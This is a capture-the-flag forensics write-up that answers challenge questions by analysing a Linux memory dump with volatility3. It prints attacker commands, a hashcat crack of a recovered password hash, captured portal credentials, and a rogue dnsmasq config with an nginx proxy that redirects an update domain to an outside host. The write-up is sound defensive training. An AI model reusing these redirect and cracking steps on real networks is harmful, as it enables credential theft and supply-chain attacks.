A memory dump from a connected Linux machine reveals covert network connections, fake services, and unusual redirects. Holmes investigates further to uncover how the attacker is manipulating the entire network!
What is the Linux kernel version of the provided image? (string)
Use volatility3:
$ vol -f ../memdump.mem banners.Banner
Volatility 3 Framework 2.27.0
Progress: 100.00 PDB scanning finished
Offset Banner
0x67200200 Linux version 5.10.0-35-amd64 (debian-kernel@lists.debian.org) (gcc-10 (Debian 10.2.1-6) 10.2.1 20210110, GNU ld (GNU Binutils for Debian) 2.35.2) #1 SMP Debian 5.10.237-1 (2025-05-19)
0x7f40ba40 Linux version 5.10.0-35-amd64 (debian-kernel@lists.debian.org) (gcc-10 (Debian 10.2.1-6) 10.2.1 20210110, GNU ld (GNU Binutils for Debian) 2.35.2) #1 SMP Debian 5.10.237-1 (2025-05-19)
Then, we can download the symbol files for volatility3:
cd volatility3/symbols/linux/
wget "https://github.com/Abyss-W4tcher/volatility3-symbols/raw/refs/heads/master/Debian/amd64/5.10.0/35/Debian_5.10.0-35-amd64_5.10.237-1_amd64.json.xz"
The attacker connected over SSH and executed initial reconnaissance commands. What is the PID of the shell they used? (number)
Use volatility3:
$ vol -vvv -f ../memdump.mem linux.bash.Bash
13608 bash 2025-09-03 08:16:48.000000 UTC id
13608 bash 2025-09-03 08:16:52.000000 UTC
13608 bash 2025-09-03 08:16:52.000000 UTC cat /etc/os-release
13608 bash 2025-09-03 08:16:58.000000 UTC uname -a
13608 bash 2025-09-03 08:17:02.000000 UTC ip a
13608 bash 2025-09-03 08:17:04.000000 UTC 0
13608 bash 2025-09-03 08:17:04.000000 UTC ps aux
13608 bash 2025-09-03 08:17:25.000000 UTC docker run -v /etc/:/mnt -it alpine
13608 bash 2025-09-03 08:18:11.000000 UTC su jm
After the initial information gathering, the attacker authenticated as a different user to escalate privileges. Identify and submit that user's credentials. (user:password)
Use volatility3:
$ vol -vvv -f ../memdump.mem linux.pagecache.RecoverFs
$ unar recovered_fs.tar.gz
$ cat ./recovered_fs/92931307-c5fd-4804-94f2-a8287e677bd6/etc/passwd
jm:$1$jm$poAH2RyJp8ZllyUvIkxxd0:0:0:root:/root:/bin/bash
$ echo '$1$jm$poAH2RyJp8ZllyUvIkxxd0' > jm.hash
$ hashcat -O -a 0 -m 500 jm.hash ~/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
$ hashcat --show -m 500 jm.hash
$1$jm$poAH2RyJp8ZllyUvIkxxd0:WATSON0
The attacker downloaded and executed code from Pastebin to install a rootkit. What is the full path of the malicious file? (/path/filename.ext)
Use volatility3:
$ vol -f ../memdump.mem linux.malware.hidden_modules.Hidden_modules
Volatility 3 Framework 2.27.0
Progress: 100.00 Stacking attempts finished
Offset Module Name Code Size Taints Load Arguments File Output
0xffffc0aa0040 Nullincrevenge 0x4000 OOT_MODULE,UNSIGNED_MODULE N/A
/usr/lib/modules/5.10.0-35-amd64/kernel/lib/Nullincrevenge.ko
$ find . | grep revenge
./recovered_fs/92931307-c5fd-4804-94f2-a8287e677bd6/usr/lib/modules/5.10.0-35-amd64/kernel/lib/Nullincrevenge.ko
What is the email account of the alleged author of the malicious file? (user@example.com)
Use modinfo:
$ /sbin/modinfo ./recovered_fs/92931307-c5fd-4804-94f2-a8287e677bd6/usr/lib/modules/5.10.0-35-amd64/kernel/lib/Nullincrevenge.ko
filename: /home/jiegec/ctf/holmesctf2025/volatility3/./recovered_fs/92931307-c5fd-4804-94f2-a8287e677bd6/usr/lib/modules/5.10.0-35-amd64/kernel/lib/Nullincrevenge.ko
description: NULLINC REVENGE IS COMING...
license: GPL
author: i-am-the@network.now
depends:
retpoline: Y
name: Nullincrevenge
vermagic: 5.10.0-35-amd64 SMP mod_unload modversions
The next step in the attack involved issuing commands to modify the network settings and installing a new package. What is the name and PID of the package? (package name,PID)
From bash history:
$ vol -vvv -f ../memdump.mem linux.bash.Bash
22714 bash 2025-09-03 08:20:31.000000 UTC apt install -y dnsmasq
22714 bash 2025-09-03 08:20:50.000000 UTC rm /etc/dnsmasq.conf
22714 bash 2025-09-03 08:20:56.000000 UTC nano /etc/dnsmasq.conf
22714 bash 2025-09-03 08:21:23.000000 UTC systemctl enable --now dnsmasq
22714 bash 2025-09-03 08:21:30.000000 UTC systemctl restart dnsmasq
$ vol -f ../memdump.mem linux.psaux.PsAux
38687 1 dnsmasq /usr/sbin/dnsmasq -x /run/dnsmasq/dnsmasq.pid -u dnsmasq -7 /etc/dnsmasq.d,.dpkg-dist,.dpkg-old,.dpkg-new --local-service --trust-anchor=.,20326,8,2,E06D44B80B8F1D39A95C0B0D7C65D08458E880409BBC683457104237C7F8EC8D --trust-anchor=.,38696,8,2,683D2D0ACB8C9B712A1948B27F741219298D0A450D612C483AF444A4C0FB2B16
Clearly, the attacker's goal is to impersonate the entire network. One workstation was already tricked and got its new malicious network configuration. What is the workstation's hostname?
From recovered fs:
$ cat recovered_fs/92931307-c5fd-4804-94f2-a8287e677bd6/var/lib/misc/dnsmasq.leases
1:1756891471 00:50:56:b4:32:cd 192.168.211.52 Parallax-5-WS-3 01:00:50:56:b4:32:cd
After receiving the new malicious network configuration, the user accessed the City of CogWork-1 internal portal from this workstation. What is their username? (string)
Search for HTTP requests in the memory dump:
POST /index.php HTTP/1.1^M
Host: 10.129.232.25:8081^M
Connection: keep-alive^M
Content-Length: 43^M
Cache-Control: max-age=0^M
Origin: http://10.129.232.25:8081^M
Content-Type: application/x-www-form-urlencoded^M
Upgrade-Insecure-Requests: 1^M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0^M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7^M
Referer: http://10.129.232.25:8081/^M
Accept-Encoding: gzip, deflate^M
Accept-Language: en-US,en;q=0.9^M
Cookie: PHPSESSID=189b027ab0e5e10f496e57953544cd74^M
^M
username=mike.sullivan&password=Pizzaaa1%21
Finally, the user updated a software to the latest version, as suggested on the internal portal, and fell victim to a supply chain attack. From which Web endpoint was the update downloaded?
Grep for HTTP requests:
$ strings ../memdump.mem | grep "GET "
192.168.211.52 - - [03/Sep/2025:08:25:48 +0000] "GET /win10/update/CogSoftware/AetherDesk-v74-77.exe HTTP/1.1" 200 12084 "-" "AetherDesk/73.0 (Windows NT 10.0; Win64; x64)" "-"
To perform this attack, the attacker redirected the original update domain to a malicious one. Identify the original domain and the final redirect IP address and port. (domain,IP:port)
From recovered fs:
$ cat recovered_fs/92931307-c5fd-4804-94f2-a8287e677bd6/etc/dnsmasq.conf
interface=ens224
dhcp-range=192.168.211.30,192.168.211.240,1h
dhcp-option=3,192.168.211.8
dhcp-option=6,192.168.211.8
no-hosts
no-resolv
server=8.8.8.8
address=/updates.cogwork-1.net/192.168.211.8
log-queries=no
quiet-dhcp
quiet-dhcp6
log-facility=/dev/null
$ cat recovered_fs/92931307-c5fd-4804-94f2-a8287e677bd6/tmp/default.conf
server {
listen 80;
location / {
proxy_pass http://13.62.49.86:7477/;
proxy_set_header Host jm_supply;
}
}